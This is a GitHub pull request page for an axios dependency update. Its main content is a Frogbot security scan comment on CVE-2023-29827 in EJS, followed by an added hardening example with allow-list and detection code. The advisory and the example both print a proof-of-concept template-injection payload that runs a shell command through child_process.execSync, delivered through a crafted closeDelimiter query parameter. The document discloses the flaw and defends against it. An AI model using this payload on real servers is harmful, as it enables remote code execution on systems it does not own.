Updated axios #97

Open
wants to merge 4 commits into master from enhancement/updated-axios

Conversation

eyalk007

Updated axios version without a vulnerability

@eyalk007 eyalk007 added dependencies Pull requests that update a dependency file safe to test Approve running integration tests on a pull request labels Oct 13, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 13, 2024
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from 99c17de to 8b084e1 on October 13, 2024 at 11:40
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 13, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 13, 2024
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from 8b084e1 to 90ec1f2 on October 14, 2024 at 09:01
@eyalk007 eyalk007 requested a review from attiasas October 14, 2024 09:03
@eyalk007 eyalk007 self-assigned this Oct 14, 2024
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 14, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 14, 2024
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from 90ec1f2 to 0dfe4c6 on October 14, 2024 at 09:05
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from 0dfe4c6 to 9864fe0 on October 14, 2024 at 09:08
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 14, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 14, 2024
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from 867b92f to a8a2892 on October 16, 2024 at 20:36
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 16, 2024

🚨 Frogbot scanned this pull request and found the below:

📦 Vulnerable Dependencies

✍️ Summary

Severity: Critical
Contextual analysis: Not Applicable
Direct dependencies: ts-jest:29.2.5
Impacted dependency: ejs 3.1.10
Fixed versions: -
CVEs: CVE-2023-29827

🔬 Research Details

Description:
Embedded JavaScript templates, also known as EJS, is one of the most popular Node.js templating engines, which is compiled with the Express JS view system.

When rendering views using EJS, it is possible to bypass ejs' template injection restrictions, by abusing the closeDelimiter rendering option, in the case when -

  1. The template itself can be partially controlled by the attacker
  2. The template rendering options can be fully controlled by the attacker

The vulnerability was rightfully disputed due to the fact that a vulnerable configuration is extremely unlikely to exist in any real-world setup. As such, the maintainers will not provide a fix for this (non-)issue.

Example of a vulnerable application -

const express = require('express')
const app = express()
const port = 3000

app.set('view engine', 'ejs'); // requires the ejs package; renders views/page.ejs below

app.get('/page', (req,res) => {
    res.render('page', req.query); // OPTS (2nd parameter) IS ATTACKER-CONTROLLED
})

app.listen(port, () => {
  console.log(`Example app listening on port ${port}`) // template literal, so ${port} is interpolated
})

Contents of page.ejs (very unlikely to be attacker controlled) -

%%1");process.mainModule.require('child_process').execSync('calc');//

In this case, sending closeDelimiter with the same malicious code that already exists at page.ejs will trigger the injection -
http://127.0.0.1:3000/page?settings[view%20options][closeDelimiter]=1")%3bprocess.mainModule.require('child_process').execSync('calc')%3b//
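The handler in the Frogbot note passes `req.query` straight into `res.render`, which is the only reason a `settings[view options][closeDelimiter]` query parameter can reach EJS as a rendering option. The block below is an added example written for this page; it is not code from this PR, from the ejs project, or from the Frogbot advisory. It shows the allow-list pattern that closes that path next to the vulnerable pattern, plus a check that spots option-override attempts in a parsed query. It assumes Express's default extended query parser (qs) turns the exploit URL above into the nested object constructed inline, and the `RESERVED_KEYS` list is my own reading of EJS's option names rather than something taken from the page; verify it against the ejs version in your lockfile. Neither express nor ejs is needed to run it.

```javascript
// Added example, not from the PR or the Frogbot advisory: keeping attacker input
// out of EJS rendering options in an Express handler.

// Constructed input: what Express's default extended query parser (qs) produces
// for the exploit URL above, plus a top-level `delimiter` to show that reserved
// names are refused even when they appear outside `settings`. (Assumed shape.)
const exploitQuery = {
  settings: {
    'view options': {
      closeDelimiter: '1");process.mainModule.require(\'child_process\').execSync(\'calc\');//',
    },
  },
  title: 'Hello',
  delimiter: '?',
};

// Names that EJS/Express treat as rendering options rather than template data.
// `closeDelimiter` is the one abused in CVE-2023-29827; the rest are EJS option
// names as I know them (assumption, not taken from the page).
const RESERVED_KEYS = new Set([
  'settings', 'views', 'root', 'cache', 'filename', 'delimiter', 'openDelimiter',
  'closeDelimiter', 'outputFunctionName', 'localsName', 'escapeFunction', 'client',
  'compileDebug', 'debug', '_with', 'strict', 'rmWhitespace', 'async', 'context',
]);

// Vulnerable pattern from the advisory: whatever the client sent becomes the
// second argument of res.render, options included.
function unsafeLocals(query) {
  return query;
}

// Hardened pattern: copy only an explicit allow-list of scalar keys, coerce them
// to strings, and never pass a reserved option name through even if it was
// allow-listed by mistake. The null-prototype object keeps keys like
// `__proto__` or `constructor` from reaching the template as inherited values.
function safeLocals(query, allowedKeys) {
  const locals = Object.create(null);
  for (const key of allowedKeys) {
    if (RESERVED_KEYS.has(key)) continue;
    const value = query[key];
    if (typeof value === 'string' || typeof value === 'number' || typeof value === 'boolean') {
      locals[key] = String(value);
    }
  }
  return locals;
}

// Detection helper: list every reserved option name found anywhere in the parsed
// query, as dotted paths, so a request like the exploit URL can be logged or
// rejected before render is ever called.
function findOptionOverrides(query, path = []) {
  const hits = [];
  if (query === null || typeof query !== 'object') return hits;
  for (const [key, value] of Object.entries(query)) {
    const here = [...path, key];
    if (RESERVED_KEYS.has(key)) hits.push(here.join('.'));
    hits.push(...findOptionOverrides(value, here));
  }
  return hits;
}

// Usage in a real handler would be:
//   const overrides = findOptionOverrides(req.query);
//   if (overrides.length) return res.status(400).end();
//   res.render('page', safeLocals(req.query, ['title']));
```

The allow-list is the actual fix; the override scan is a secondary signal worth logging, since a request carrying `settings[view options]` in its query string has no legitimate reason to exist.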


@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@eyalk007 eyalk007 force-pushed the enhancement/updated-axios branch from db1afe8 to 39a2038 on October 16, 2024 at 23:00
@eyalk007 eyalk007 added the safe to test Approve running integration tests on a pull request label Oct 16, 2024
@github-actions github-actions bot removed the safe to test Approve running integration tests on a pull request label Oct 16, 2024
Labels
dependencies Pull requests that update a dependency file
1 participant